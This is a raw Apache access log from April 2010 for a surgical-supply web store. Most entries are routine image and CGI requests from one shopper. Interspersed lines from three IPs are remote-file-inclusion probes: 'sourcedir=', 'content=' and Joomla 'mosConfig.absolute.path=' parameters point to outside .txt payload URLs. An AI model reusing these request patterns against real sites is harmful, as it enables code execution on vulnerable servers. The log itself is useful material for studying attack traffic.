218.103.237.136 - - [16/Apr/2010:02:27:24 -0400] "GET /images/next.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:24 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:24 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:25 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:25 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:25 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:25 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:25 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:25 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:25 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:25 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:25 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:25 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
83.69.115.198 - - [16/Apr/2010:02:27:29 -0400] "GET /?sourcedir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
83.69.115.198 - - [16/Apr/2010:02:27:29 -0400] "GET /logs/?sourcedir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 200 46442 "-" "Mozilla/5.0"
83.69.115.198 - - [16/Apr/2010:02:27:29 -0400] "GET /logs/access_log.Q110040600%20%20/?sourcedir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.69.115.198 - - [16/Apr/2010:02:27:40 -0400] "GET /logs/error_log.Q110040600%20%20/?sourcedir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:02:27:35 -0400] "GET /logs/error_log.Q109073000 HTTP/1.0" 200 2505495 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.103.237.136 - - [16/Apr/2010:02:27:54 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG HTTP/1.1" 200 45499 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/prev.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:56 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:57 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:57 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:57 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:58 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:58 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:58 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:58 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:58 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:28:00 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:28:00 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:28:06 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L8275025A952990000B47057+M37+ENG HTTP/1.1" 200 59232 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501579AE9C000EBB7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:28:13 -0400] "GET /images/next.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8275025A952990000B47057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
82.102.6.110 - - [16/Apr/2010:02:28:40 -0400] "GET /logs//home.php?content=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:02:28:40 -0400] "GET //home.php?content=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:02:28:40 -0400] "GET /logs/error_log.Q109100900//home.php?content=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:02:28:44 -0400] "GET /logs//home.php?content=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:02:28:44 -0400] "GET /logs/error_log.Q109100900//home.php?content=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:02:28:44 -0400] "GET //home.php?content=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.103.237.136 - - [16/Apr/2010:02:28:47 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8275025A952990000B47057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
82.102.6.110 - - [16/Apr/2010:02:28:50 -0400] "GET /logs//home.php?content=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:02:28:50 -0400] "GET //home.php?content=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:02:28:50 -0400] "GET /logs/error_log.Q109100900//home.php?content=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:02:28:51 -0400] "GET //home.php?content=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:02:28:51 -0400] "GET /logs//home.php?content=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:02:28:51 -0400] "GET /logs/error_log.Q109100900//home.php?content=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.103.237.136 - - [16/Apr/2010:02:28:58 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L8275025A9B9990001477057+M37+ENG HTTP/1.1" 200 59407 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8275025A952990000B47057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:08 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L82750258913930004557057+M37+ENG HTTP/1.1" 200 59386 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8275025A9B9990001477057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L827502529C3940005617057+M37+ENG HTTP/1.1" 200 59430 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L82750258913930004557057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
78.110.50.121 - - [16/Apr/2010:02:29:23 -0400] "GET /logs//component/option,com_joomap/Itemid,35//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/test.txt?? HTTP/1.1" 404 293 "-" "Microsoft Pocket Internet Explorer/0.6"
78.110.50.121 - - [16/Apr/2010:02:29:24 -0400] "GET //component/option,com_joomap/Itemid,35//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/test.txt?? HTTP/1.1" 404 288 "-" "Microsoft Pocket Internet Explorer/0.6"
218.103.237.136 - - [16/Apr/2010:02:29:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG HTTP/1.1" 200 38013 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502529C3940005617057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:32 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502529C3940005617057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:33 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:34 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:34 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:35 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:35 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:29:36 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827502599B2970005197057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
